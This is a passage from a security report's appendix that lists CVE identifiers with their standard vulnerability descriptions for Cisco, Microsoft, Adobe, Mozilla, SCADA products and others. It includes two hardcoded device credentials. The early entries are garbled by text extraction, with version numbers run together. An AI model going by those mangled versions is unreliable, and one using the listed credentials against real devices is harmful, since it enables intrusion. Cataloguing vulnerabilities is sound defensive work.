CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28

CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055

CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676

CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389

CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo

CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386

CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors

CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd

CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU

CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect

confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity

CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169

CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function

CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document

CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors

CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors

CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location

CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action

CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject

CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate

CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors

CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897

CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation

CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671

CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341

CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)

CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack

CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28

Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet

CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130

CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring

CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter

CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo

CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo

CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo

CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo

CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo

CVE-2013-3206

rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo

CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash

CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724

CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262

CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter

CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL

CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo

CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo

CVE-2013-3893  Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897  Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900  The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905  Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223  The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436  The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478  Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529  Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555  Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776  NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.

CVE-2013-4782  The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster Page 21 of 28

CVE-2013-5057  hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369  IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428  IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431  Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1 and 6.2.2 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1 and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494  Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507  The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536  Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559  Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561  The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751  Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757  Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828  Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167  Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188  Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284  Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396  The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475  Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660  The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699  The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702  The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979  The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994  OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004  D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043  Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389  Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001  Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035  The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160  The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207  The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259  Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266  The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294  Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313  Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354  The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362  Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433  Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488  APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493  Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494  Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498  Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X, and before 11.2.202.341 on Linux; Adobe AIR before 4.0.0.1628 on Android; Adobe AIR SDK before 4.0.0.1628; and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515  Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533  Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536  Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562  Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577  Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765  Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767  Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783  Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330  WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342  WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349  Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356  Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370  The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379  Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382  WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466  SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472  Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477  Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518  Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563  Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565  The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586  content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701  The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740  Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744  Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753  Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806  The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808  Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811  The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

